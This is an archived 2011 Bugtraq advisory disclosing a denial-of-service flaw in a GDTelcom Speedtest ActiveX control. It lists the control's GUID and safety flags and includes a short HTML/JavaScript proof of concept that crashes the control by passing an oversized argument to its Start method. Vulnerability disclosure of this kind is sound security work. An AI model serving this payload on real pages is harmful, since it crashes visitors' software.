lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201111011345.pA1DjrIR001664@sf01web2.securityfocus.com>
Date: Tue, 1 Nov 2011 13:45:53 GMT
From: demonalex@....com
To: bugtraq@...urityfocus.com
Subject: GDTelcom Speedtest ActiveX Control "FTPDownLoad Class"-ActiveX.dll
 Remote Denial of Service Vulnerability

Title: GDTelcom Speedtest ActiveX Control "FTPDownLoad Class"-ActiveX.dll Remote Denial of Service Vulnerability

Software: GDTelcom Speedtest ActiveX Control "FTPDownLoad Class"-ActiveX.dll(Version 1.0)

Vulnerability Published :2011-10-15

Vulnerability Update Time :2011-09-10

Vendor: www.gdcn.com(No vendor response)

Download: http://10000.gd.cn/speedtest/ActiveX.dll

Impact: Median

Bug Description: GDTelcom Speedtest ActiveX Control "FTPDownLoad Class"-ActiveX.dll(Version 1.0) NULL Pointer Dereference.

Class Info:
Class FTPDownLoad
GUID: {348AA067-D6BC-4385-A833-08E308D35782}
Number of Interfaces: 1
Default Interface: IFTPDownLoad
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False

PoC:
****************************************************************
<html>
<body>
<object classid='clsid:348AA067-D6BC-4385-A833-08E308D35782' id='target'></object>
<script language='javascript'>
var arg1=2147483647;
target.Start(arg1); 
</script>
</body>
</html>
****************************************************************

Credits: This vulnerability was discovered by demonalex (at) 163 (dot) com
Pentester/Researcher
Dark2S Security Team/PolyU.HK

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ